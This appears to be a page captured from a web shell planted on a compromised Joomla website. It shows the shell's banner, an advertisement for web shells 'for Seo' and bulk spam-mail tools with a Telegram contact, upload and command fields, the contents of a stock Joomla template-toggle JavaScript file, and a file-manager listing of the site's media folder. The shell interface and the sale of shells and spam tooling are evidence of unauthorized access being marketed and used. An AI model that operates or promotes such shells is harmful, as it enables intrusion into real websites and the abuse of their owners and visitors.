__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
(function () {
  'use strict';

  /**
   * @copyright  (C) 2018 Open Source Matters, Inc. <https://www.joomla.org>
   * @license    GNU General Public License version 2 or later; see LICENSE.txt
   */
  (function () {
    var showDiffChangedOff = function showDiffChangedOff() {
      var diffMain = document.getElementById('diff-main');
      if (diffMain) {
        diffMain.classList.remove('active');
        if (typeof Storage !== 'undefined') {
          localStorage.removeItem('diffSwitchState');
        }
      }
    };
    var showDiffChangedOn = function showDiffChangedOn() {
      var diffMain = document.getElementById('diff-main');
      if (diffMain) {
        diffMain.classList.add('active');
        if (typeof Storage !== 'undefined') {
          localStorage.setItem('diffSwitchState', 'checked');
        }
      }
    };
    var showCoreChangedOff = function showCoreChangedOff() {
      var override = document.getElementById('override-pane');
      var corePane = document.getElementById('core-pane');
      var fieldset = override.parentElement.parentElement;
      if (corePane && override) {
        corePane.classList.remove('active');
        if (fieldset.classList.contains('options-grid-form-half')) {
          fieldset.classList.remove('options-grid-form-half');
          fieldset.classList.add('options-grid-form-full');
        }
        if (typeof Storage !== 'undefined') {
          localStorage.removeItem('coreSwitchState');
        }
      }
    };
    var showCoreChangedOn = function showCoreChangedOn() {
      var override = document.getElementById('override-pane');
      var corePane = document.getElementById('core-pane');
      var fieldset = override.parentElement.parentElement;
      if (corePane && override) {
        corePane.classList.add('active');
        if (fieldset.classList.contains('options-grid-form-full')) {
          fieldset.classList.remove('options-grid-form-full');
          fieldset.classList.add('options-grid-form-half');
        }
        if (Joomla.editors.instances.jform_core) {
          Joomla.editors.instances.jform_core.refresh();
        }
        if (typeof Storage !== 'undefined') {
          localStorage.setItem('coreSwitchState', 'checked');
        }
      }
    };
    document.addEventListener('DOMContentLoaded', function () {
      var JformShowDiffOn = document.getElementById('jform_show_diff1');
      var JformShowDiffOff = document.getElementById('jform_show_diff0');
      var JformShowCoreOn = document.getElementById('jform_show_core1');
      var JformShowCoreOff = document.getElementById('jform_show_core0');
      if (JformShowDiffOn && JformShowDiffOff) {
        JformShowDiffOn.addEventListener('click', showDiffChangedOn);
        JformShowDiffOff.addEventListener('click', showDiffChangedOff);
      }
      if (JformShowCoreOn && JformShowCoreOff) {
        JformShowCoreOn.addEventListener('click', showCoreChangedOn);
        JformShowCoreOff.addEventListener('click', showCoreChangedOff);
      }
      if (typeof Storage !== 'undefined' && localStorage.getItem('coreSwitchState') && JformShowCoreOn) {
        JformShowCoreOn.checked = true;
        JformShowCoreOff.checked = false;
        showCoreChangedOn();
      }
      if (typeof Storage !== 'undefined' && localStorage.getItem('diffSwitchState') && JformShowDiffOn) {
        JformShowDiffOn.checked = true;
        JformShowDiffOff.checked = false;
        showDiffChangedOn();
      }
    });
  })();

})();

Filemanager

Name Type Size Permission Actions
admin-template-compare-es5.js File 1.99 KB 0664
admin-template-compare-es5.min.js File 1.11 KB 0664
admin-template-compare-es5.min.js.gz File 678 B 0664
admin-template-compare.js File 1.78 KB 0664
admin-template-compare.min.js File 1.03 KB 0664
admin-template-compare.min.js.gz File 654 B 0664
admin-template-toggle-assignment-es5.js File 741 B 0664
admin-template-toggle-assignment-es5.min.js File 512 B 0664
admin-template-toggle-assignment-es5.min.js.gz File 343 B 0664
admin-template-toggle-assignment.js File 630 B 0664
admin-template-toggle-assignment.min.js File 433 B 0664
admin-template-toggle-assignment.min.js.gz File 314 B 0664
admin-template-toggle-switch-es5.js File 3.41 KB 0664
admin-template-toggle-switch-es5.min.js File 1.88 KB 0664
admin-template-toggle-switch-es5.min.js.gz File 596 B 0664
admin-template-toggle-switch.js File 3.14 KB 0664
admin-template-toggle-switch.min.js File 1.82 KB 0664
admin-template-toggle-switch.min.js.gz File 575 B 0664
admin-templates-default-es5.js File 5.42 KB 0664
admin-templates-default-es5.min.js File 3.04 KB 0664
admin-templates-default-es5.min.js.gz File 974 B 0664
admin-templates-default.js File 4.97 KB 0664
admin-templates-default.min.js File 2.79 KB 0664
admin-templates-default.min.js.gz File 944 B 0664
Filemanager